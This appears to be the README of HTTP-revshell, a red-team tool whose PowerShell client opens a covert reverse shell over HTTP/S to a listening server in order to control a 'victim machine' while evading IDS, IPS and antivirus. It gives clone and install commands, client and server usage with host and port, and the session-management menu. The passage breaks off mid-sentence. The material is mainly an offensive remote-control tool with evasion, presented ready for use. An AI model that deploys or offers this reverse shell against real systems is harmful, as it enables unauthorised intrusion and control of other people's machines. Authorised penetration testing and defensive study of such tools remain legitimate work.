HTTP-revshell is a tool focused on red team exercises and pentesters. This tool provides a reverse connection through the HTTP/s protocol. It uses a covert channel to gain control over the victim machine through web requests and thus evade solutions such as IDS, IPS, and AV. Help server.py (unisession server) Server usage: usage: server.py [-h] [--ssl] [--autocomplete] host port Process some integers. positional arguments: host Listen Host port Listen Port optional arguments: -h, --help show this help message and exit --ssl Send traffic over ssl --autocomplete Autocomplete powershell functions Help Invoke-WebRev.ps1 (client) Client usage: Import-Module .\Invoke-WebRev.ps1 Invoke-WebRev -ip IP -port PORT [-ssl] Installation git clone https://github.com/3v4Si0N/HTTP-revshell.git cd HTTP-revshell/ pip3 install -r requirements.txt Quick start server-multisession.py (multisession server) This server allows multiple connection of clients. There is a menu with three basic commands: sessions, interact and exit - sessions --> show currently active sessions - interact --> interacts with a session....